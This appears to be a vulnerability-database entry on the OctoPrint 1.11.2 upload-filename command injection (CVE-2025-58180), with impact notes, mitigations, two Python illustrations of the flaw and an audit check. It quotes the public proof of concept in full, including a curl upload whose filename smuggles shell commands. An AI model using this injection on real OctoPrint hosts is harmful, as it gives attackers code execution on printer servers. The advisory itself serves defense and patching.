OctoPrint 1.11.2 - File Upload
OctoPrint versions up to and including 1.11.2 contain an authenticated command injection reachable through the web interface's file upload (CVE-2025-58180, fixed in 1.11.3). An attacker holding a valid session or API key with upload rights can give an uploaded file a name containing shell metacharacters; if an administrator has configured a system event handler whose command interpolates a filename or path placeholder, that name is passed to the shell unescaped and executes on the host OctoPrint runs on. Exploitation therefore yields code execution on the server, which is commonly used to manage 3D printers remotely, and from there disruption or manipulation of print jobs. No exploitation in the wild has been observed, but proof-of-concept code is public. The flaw affects the confidentiality and integrity of the printing environment and its availability if used to disrupt services. Organizations running OctoPrint for industrial or hobbyist 3D printing should upgrade to 1.11.3 and, until then, restrict access to the OctoPrint interface, disable system event handlers that use filename placeholders, and monitor uploads closely. Countries with significant manufacturing sectors and advanced 3D printing adoption, such as Germany and the Netherlands, are more likely to be impacted.
AI Analysis
Technical Summary
OctoPrint is an open-source web interface widely used for controlling and monitoring 3D printers remotely. Versions up to and including 1.11.2 contain a command injection (CVE-2025-58180, GHSA-49mj-x8jp-qvfc, CVSS 7.5 per the advisory) that is triggered through the file upload endpoint of the web interface. OctoPrint's default filename sanitization accepts shell metacharacters such as ';' and '${IFS}'. When an upload completes, the FileAdded event carries the new file's name and path; if an administrator has configured a system event handler whose command uses a placeholder such as {path}, that value is substituted into the command string without escaping and run through the shell (subprocess with shell=True), so the metacharacters in the filename become additional commands executed as the OctoPrint service user. Two conditions must hold: the attacker needs an authenticated session or API key with upload rights (no admin or root privileges), and an administrator must have configured such a handler, which is not the default. Because OctoPrint runs on the host wired to the printer, the result is code execution on that host, manipulation of print jobs, potential physical damage to printers or defective prints, and a foothold on the surrounding network. Exploit code is publicly available (EDB-ID 52476, supplied as a plain-text manual proof of concept rather than an automated script), although no active attacks have been reported. The vulnerability primarily affects the integrity and availability of the printing process and can expose design files or other data if the attacker pivots further. The fix is in OctoPrint 1.11.3; where upgrading is delayed, disabling system event handlers that use filename placeholders and enabling feature.enforceReallyUniversalFilenames are the documented workarounds. Given OctoPrint's deployment in both hobbyist and industrial environments, the risk varies with the criticality of the printing operations; overall the vulnerability represents a moderate threat to environments relying on OctoPrint for 3D printing management.
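To make the mechanism concrete, the following is an added example (not OctoPrint's own code) that reconstructs, in simplified form, the pattern the advisory describes: an administrator-written shell command template such as "{path}" rendered with str.format from the event payload and run with shell=True, beside the hardened variant that shell-quotes each substituted value, and an allowlist check in the spirit of the "really universal filenames" workaround. The payload keys, the upload directory, the "echo {path}" template and the exact allowlist character set are assumptions; the injected filename keeps the PoC's shape but swaps the destructive touch for a visible echo marker.

```python
import re
import shlex
import subprocess
from typing import Dict, List

# Constructed stand-in for the directory OctoPrint stores uploads in.
UPLOAD_DIR = "/uploads"


def event_payload(filename: str) -> Dict[str, str]:
    """The subset of a FileAdded-style payload a command template can reference (assumed keys)."""
    return {"name": filename, "path": f"{UPLOAD_DIR}/{filename}"}


def _run_shell(command: str) -> List[str]:
    """Run a command string through /bin/sh and return its stdout lines."""
    proc = subprocess.run(command, shell=True, capture_output=True, text=True)
    return proc.stdout.splitlines()


def run_handler_vulnerable(template: str, filename: str) -> List[str]:
    """The pattern the PoC exploits: placeholders substituted verbatim into a shell string.

    A filename such as "x;echo${IFS}INJECTED;#.gcode" turns the single command the
    administrator wrote into three shell commands: the intended one, the injected one,
    and a trailing comment that swallows the ".gcode" suffix.
    """
    return _run_shell(template.format(**event_payload(filename)))


def run_handler_hardened(template: str, filename: str) -> List[str]:
    """Same template, but every substituted value is shell-quoted first.

    The template stays a shell string (administrators write them that way), so the
    fix is to make each placeholder expand to exactly one literal shell word.
    """
    quoted = {key: shlex.quote(value) for key, value in event_payload(filename).items()}
    return _run_shell(template.format(**quoted))


# Independent second layer: accept only plain portable names. The exact character set
# OctoPrint enforces under feature.enforceReallyUniversalFilenames is not on the page,
# so this allowlist is an assumption.
_UNIVERSAL = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*$")


def is_really_universal(filename: str) -> bool:
    """Reject anything that is not a plain portable filename (no metacharacters, no dot-names)."""
    return bool(_UNIVERSAL.match(filename))


# Constructed inputs: a benign upload, and an injected name shaped like the PoC's but with
# the destructive `touch` swapped for an `echo` marker so the demo is visibly harmless.
BENIGN = "ok.gcode"
INJECTED = "x;echo${IFS}INJECTED;#.gcode"
TEMPLATE = "echo {path}"  # assumed administrator-configured handler (the PoC uses "{path}" alone)


if __name__ == "__main__":
    print("vulnerable:", run_handler_vulnerable(TEMPLATE, INJECTED))
    print("hardened:  ", run_handler_hardened(TEMPLATE, INJECTED))
    print("allowlist: ", is_really_universal(BENIGN), is_really_universal(INJECTED))
```

The vulnerable path prints two lines, the intended "/uploads/x" and then "INJECTED" from the second command the shell split out of the filename; the hardened path prints the whole name as one literal line because shlex.quote wrapped it in single quotes. Quoting at the substitution point is the minimal fix for a template that must stay a shell string; the allowlist is a belt-and-braces control that also keeps such names out of the uploads folder in the first place.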
Potential Impact
For European organizations, the impact of this vulnerability can range from minor disruptions in hobbyist 3D printing setups to significant operational risks in industrial environments where 3D printing is integrated into manufacturing or prototyping workflows. A crafted upload filename executes arbitrary commands as the OctoPrint service account on the host, potentially compromising the device and the network it resides on. This could result in altered print jobs, causing defective or unsafe products, or denial of service by disrupting printing operations. Confidentiality risks arise if attackers gain access to sensitive design files or network information. The impact is particularly relevant for sectors such as automotive, aerospace, and medical device manufacturing, where 3D printing is increasingly used and where product integrity is critical. Disruption of printing services could also delay production timelines and increase costs. Exposure is narrower than a generic file upload flaw: exploitation requires an account or API key with upload rights and an administrator-configured system event handler that uses a filename or path placeholder, so instances without such handlers are not exploitable by this path. The absence of known exploits in the wild currently reduces immediate risk but does not eliminate the threat, especially as exploit code is publicly available.
Mitigation Recommendations
1. Upgrade OctoPrint to 1.11.3 or later, the version the advisory names as patched; this is the only complete fix.
2. Until the upgrade is done, review ~/.octoprint/config.yaml (or the Event Manager in the GUI) for system event handlers whose command interpolates {path}, {name} or similar placeholders and disable them; set feature.enforceReallyUniversalFilenames: true so uploads are limited to portable filenames, and vet filenames already in the uploads folder for shell metacharacters.
3. Restrict network access to the OctoPrint interface with firewall rules and VPN access so that only trusted users reach it, and never expose it directly to the internet.
4. Limit who holds upload rights: remove unused accounts, rotate API keys, and enforce strong authentication where possible, since any upload-capable account can trigger the flaw.
5. Isolate OctoPrint devices on segmented networks to reduce lateral movement opportunities if a host is compromised.
6. Monitor upload activity and the OctoPrint host: upload names containing ';', '$', backticks or similar characters, and unexpected child processes of the OctoPrint service, are the observable signs of exploitation attempts.
7. Regularly back up OctoPrint configurations and print files to enable recovery in case of compromise.
8. Educate users on the risks of unauthorized access and keep track of further OctoPrint security advisories so that later fixes are applied promptly.
Affected Countries
Germany, Netherlands, France, United Kingdom, Italy, Sweden
Indicators of Compromise
- exploit-code:
# Exploit Title: OctoPrint 1.11.2 - File Upload
# Date: 2025-09-28
# Exploit Author: prabhatverma.addada
# Vendor Homepage: https://octoprint.org
# Software Link: https://github.com/OctoPrint/OctoPrint
# Affected Version(s): <= 1.11.2
# Patched Version(s): 1.11.3
# CVE: CVE-2025-58180
# CVSS (per advisory): 7.5
# Platform: Linux / OctoPrint server
# Type: Remote Code Execution (requires authenticated upload / API key or session)
#
# Short description:
# An authenticated attacker with file-upload access can craft a filename containing shell metacharacters (e.g. ';', ${IFS}) which bypasses filename
# sanitization and, when interpolated into a configured system event handler command, results in arbitrary command execution on the host.
#
# Scope & privileges:
# - Trigger privileges: Authenticated file-upload (API key or valid session). NO admin/root required to trigger the attack.
# - Precondition: A system event handler that executes shell commands using filename/path placeholders must be configured by an administrator.
#
# Tested on:
# - OctoPrint 1.11.2 running via `octoprint serve --port 5000` on Ubuntu 22.04
#
# Reproduction / PoC (manual):
#
# 1) Start OctoPrint 1.11.2:
#    octoprint serve --port 5000 --debug
#    Complete initial setup at http://127.0.0.1:5000 and create an admin user.
#
# 2) Configure a system event handler that runs shell commands with filename placeholders:
#    Edit ~/.octoprint/config.yaml and add:
#
#    events:
#      enabled: true
#      subscriptions:
#        - event: FileAdded
#          type: system
#          debug: true
#          command: "{path}"
#
#    Restart OctoPrint.
#
# 3) Create a harmless test gcode:
#    mkdir -p /tmp/gcode
#    cat > /tmp/gcode/ok.gcode <<'EOF'
#    ; minimal gcode
#    G28
#    M105
#    EOF
#
# 4) Obtain API key from Settings -> API and export it:
#    export API_KEY='<your_api_key_here>'
#
# 5) Ensure target proof file does not exist:
#    ls -la /tmp/test123
#
# 6) PoC upload (non-destructive proof):
#    INJECT_NAME='octo;touch${IFS}/tmp/test123;#.gcode'
#
#    curl -sS -X POST -H "X-Api-Key: $API_KEY" \
#      -F "file=@/tmp/gcode/ok.gcode;filename=\"${INJECT_NAME}\"" \
#      "http://127.0.0.1:5000/api/files/local"
#
# 7) Verify execution:
#    ls -la /tmp/test123
#    If /tmp/test123 exists, the injected command executed and RCE is demonstrated.
#
# Explanation:
# - OctoPrint accepted the uploaded filename (sanitize_name allowed these characters in default config).
# - FileAdded event payload contains the filename/path.
# - A system event subscriber executed a shell command with that placeholder via subprocess with shell=True and without placeholder escaping.
# - Shell metacharacters in the filename are interpreted by the shell and executed.
#
# Mitigations / Workarounds:
# - Upgrade OctoPrint to 1.11.3 (patched).
# - Disable event handlers using filename placeholders (set enabled: false or uncheck in GUI Event Manager).
# - Set feature.enforceReallyUniversalFilenames: true in config.yaml and vet existing uploads.
# - Do not expose OctoPrint to hostile networks; restrict upload access.
#
# References:
# - GitHub Security Advisory: https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-49mj-x8jp-qvfc
# - PoC repo: https://github.com/prabhatverma47/CVE-2025-58180
#
# Notes for triage:
# - Exploit requires only authenticated upload privileges to trigger. No admin/root required to perform the attack.
# - PoC uses non-destructive `touch /tmp/test123`.
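A compensating-control check for the mitigation list above and the PoC's own "Mitigations / Workarounds", as an added example that is not OctoPrint's tooling: it walks the events.subscriptions structure the PoC shows in config.yaml, flags every active system handler whose command contains a file placeholder, reports whether feature.enforceReallyUniversalFilenames is switched on, and vets upload names for shell metacharacters. The placeholder list, the per-subscription enabled flag and the sample config and upload names are assumptions or constructed data; on a real host feed it yaml.safe_load() of ~/.octoprint/config.yaml and the listing of the uploads folder.

```python
import os
import re
from typing import Any, Dict, List

# Placeholders that carry attacker-controlled filename material. {path} and {name} are the
# ones the PoC and sample config use; {filename} is an assumed variant worth catching too.
FILE_PLACEHOLDERS = ("{path}", "{name}", "{filename}")

# The characters the PoC relies on (';', '$', '#') plus the rest of the usual shell control set.
SHELL_META = re.compile(r"[;&|`$(){}<>\\'\"\n#]")


def risky_event_handlers(config: Dict[str, Any]) -> List[str]:
    """Return 'event: command' for every active system handler whose command uses a file placeholder."""
    events = config.get("events") or {}
    if not events.get("enabled", False):
        return []
    risky = []
    for sub in events.get("subscriptions") or []:
        if sub.get("type") != "system":
            continue
        if not sub.get("enabled", True):  # per-subscription switch, assumed to default to on
            continue
        command = str(sub.get("command", ""))
        if any(placeholder in command for placeholder in FILE_PLACEHOLDERS):
            risky.append(f"{sub.get('event')}: {command}")
    return risky


def suspicious_uploads(names: List[str]) -> List[str]:
    """Vet existing upload names: anything containing shell metacharacters deserves a look."""
    return [name for name in names if SHELL_META.search(name)]


def universal_filenames_enforced(config: Dict[str, Any]) -> bool:
    """True when the advisory's feature.enforceReallyUniversalFilenames workaround is switched on."""
    return bool((config.get("feature") or {}).get("enforceReallyUniversalFilenames", False))


def audit_uploads_dir(path: str) -> List[str]:
    """Convenience for a live host: vet every name in the uploads folder."""
    return suspicious_uploads(os.listdir(path))


# Constructed config mirroring the PoC's config.yaml, plus two handlers that are not affected:
# a system command that never touches the filename, and a gcode-type subscription (OctoPrint's
# other subscription type, which goes to the printer rather than the shell).
SAMPLE_CONFIG = {
    "events": {
        "enabled": True,
        "subscriptions": [
            {"event": "FileAdded", "type": "system", "debug": True, "command": "{path}"},
            {"event": "PrintDone", "type": "system", "command": "/usr/local/bin/notify-done"},
            {"event": "Upload", "type": "gcode", "command": "M117 uploaded {name}"},
        ],
    },
    "feature": {"enforceReallyUniversalFilenames": False},
}

# Constructed uploads listing: two ordinary names and the PoC's injected name.
SAMPLE_UPLOADS = ["ok.gcode", "bracket_v2.gcode", "octo;touch${IFS}/tmp/test123;#.gcode"]


if __name__ == "__main__":
    print("risky handlers:      ", risky_event_handlers(SAMPLE_CONFIG))
    print("universal enforced:  ", universal_filenames_enforced(SAMPLE_CONFIG))
    print("suspicious uploads:  ", suspicious_uploads(SAMPLE_UPLOADS))
```

Anything returned by risky_event_handlers is a handler to disable or rewrite before the upgrade lands. A non-empty suspicious_uploads list on a 1.11.2 host with such a handler should be treated as a possible exploitation attempt: work out what command the name would have expanded to and check the host for its effects.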
Technical Details
- EDB ID: 52476
- Has exploit code: true
- Code language: text
Threat ID: 69845ddcf9fa50a62f0fd49c
Added to database: 2/5/2026, 9:07:40 AM
Last enriched: 2/5/2026, 9:08:31 AM
Last updated: 2/5/2026, 10:39:16 PM